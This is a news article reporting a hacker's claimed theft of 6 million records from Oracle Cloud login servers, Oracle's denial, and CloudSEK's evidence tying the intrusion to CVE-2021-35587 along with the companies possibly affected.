Why trust Greenbot
Oracle has firmly denied claims of a data breach after a hacker allegedly stole 6 million records from its cloud servers. Cybersecurity researchers, however, have presented evidence suggesting the tech giant’s systems were compromised.
On March 20, a hacker using the name “rose87168” posted data for sale on the dark web forum BreachForums. The stolen information reportedly includes encrypted SSO passwords, Java KeyStore files, and LDAP credentials from Oracle Cloud federated login servers.
“There has been no breach of Oracle Cloud. The published credentials are not for the Oracle Cloud. No Oracle Cloud customers experienced a breach or lost any data,” an Oracle spokesperson told The Register.
Security firm CloudSEK contradicted Oracle’s statement in an analysis published on March 24. The researchers found the hacker likely exploited CVE-2021-35587, a critical vulnerability in unpatched Oracle Fusion Middleware 11G that allows unauthenticated HTTP access.
“This follow-up report equips the community and Oracle with facts to investigate and mitigate this threat responsibly,” said Rahul Sasi, CloudSEK’s CEO.
As proof of their access, the hacker uploaded a text file to login.us2.oraclecloud.com, which was captured by the Internet Archive‘s Wayback Machine in early March. CloudSEK verified server activity through both Wayback Machine snapshots and GitHub scripts from Oracle’s official account that referenced the compromised server.
The breach reportedly affects over 140,000 companies, with more than 1,600 Australian domains on the list. Companies including Telstra, Optus, NBN Co, and Deloitte appear among potential victims.
Two companies have reportedly already paid the hacker to remove their data. Meanwhile, major service providers like Optus and NBN Co have taken safety measures.
“In an abundance of caution, Optus has taken additional steps to ensure our systems are and remain secure,” an Optus spokesperson said.
The hacker first demanded 200 million XMR (Monero cryptocurrency) from Oracle but later offered to sell the data for undisclosed amounts or trade it for zero-day exploits.
“The SSO passwords are encrypted, they can be decrypted with the available files. LDAP hashed passwords can be cracked,” the hacker claimed in their BreachForums post.
As this dispute continues, cybersecurity experts recommend that all potentially affected organizations reset passwords, rotate credentials, and implement multi-factor authentication on cloud-facing identity providers.
